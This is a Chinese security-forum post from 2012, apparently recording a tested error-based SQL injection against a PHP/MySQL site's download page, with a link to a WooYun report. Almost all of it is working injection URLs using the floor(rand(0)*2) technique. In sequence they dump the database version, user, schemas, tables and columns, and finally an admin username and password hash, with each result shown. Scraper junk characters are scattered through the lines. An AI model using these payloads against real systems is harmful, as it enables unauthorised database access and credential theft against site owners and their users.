找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2038|回复: 0
打印 上一主题 下一主题

php+mysql高级爆错注入经测算有效

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:52:09 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
http://www.wooyun.org/bugs/wooyun-2010-01666
. K0 A$ O$ }3 C9 ]6 p, }/ [9 j* A. }9 ~* K+ j2 \
之前想找个测试 没想到这有 可以测试下做个记录而已
8 T! H+ g; g& G. F
+ t' c2 J1 t' G# a0 khttp://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003
- @  d4 d- G$ ^( X3 z8 F1 J- B! e: c  ]2 i8 _- j
/data0/htdocs/leqi_new/app/myapp.php' j' F. {9 ~$ a& Q% O

, z, V' K# F& }* ^. H3 G 或者
1 I; F9 C, }! Z- y/ X: I. X
+ x. ^! m* R6 n/ R9 j+ h7 H8 T0 P% J/**********version()**********/ 5.1.49-log
) j! R* m. ?& B: E' S. w% A- Mhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003; v2 _% |. f8 W( f3 D6 f3 g

0 h* x+ f& [+ q$ @" n3 Q3 P/ R- l/**********user()**********/  9 ?4 U2 M% j- Q7 o
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
1 S* T; u* S  g$ R9 c- k. e  j: y9 x5 P3 J% I7 H/ g
/**********database()**********/  leqi
& d6 V) h& C! n* L6 ], Y. o2 W2 Ahttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
9 Z' g- D' N, m0 E7 M' Z8 f' v, z6 g( R9 l. B
/**********limit依次递归爆库**********/
1 S$ Z# b" R; t; l( V! E3 F+ Vhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003* ?/ H& {$ g' k
information_schema9 `3 k' y' g& ?7 _# q' x- J
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
5 ^1 b! s. V; l- E! q* gleqi% M. ^7 D- ]+ }. q0 E, |
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003. M& H2 q8 D! }# i" i- v6 p' J9 v
test" ?! _) t( ?, Z9 _. H& ^* S% c7 h. x
9 k% I" n; _0 k/ i9 `  |) B
/**********limit依次递归爆表名**********/4 u/ k0 O6 }7 M# \9 a- {! @
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
6 w! e7 U2 C# ?2 dusers
6 B* y7 {7 I* j3 l1 U, @& @2 |
; S' \, _6 q6 |/**********limit依次递归爆字段名**********/0 J8 l5 {. P+ w. X
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
; \6 k  E9 i8 F$ ruser_id,username,nickname,passwd,group_id. e4 F( I. D8 {3 k, l
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
' P; Y* _" l8 M" [7 P% `/wapc/5000_0005_003
2 @) p, @: D7 ?+ u& |11 217 k8 T  _8 N) a8 c# M, `
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
3 \2 H, |  m3 ]- m/ E. i/wapc/5000_0005_003
8 v3 |; s4 n; Q: ~1 j11 341 351 361$ _5 `1 U9 ]$ u4 F, @
/**********爆数据**********/$ z, W" D/ k5 }5 j2 [6 l
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%232 u( w; S0 {7 b. g& F: H  z
admin! t4 x' p! f) }# W; o, |, |
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%232 L0 c. B; m, j
6a8b4574ca231eb8bd52764d4978ffcd
" `; t8 M$ N. U: s; a! I7 s" F# h3 x' q) `0 M
9 C' {7 `2 X0 t
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表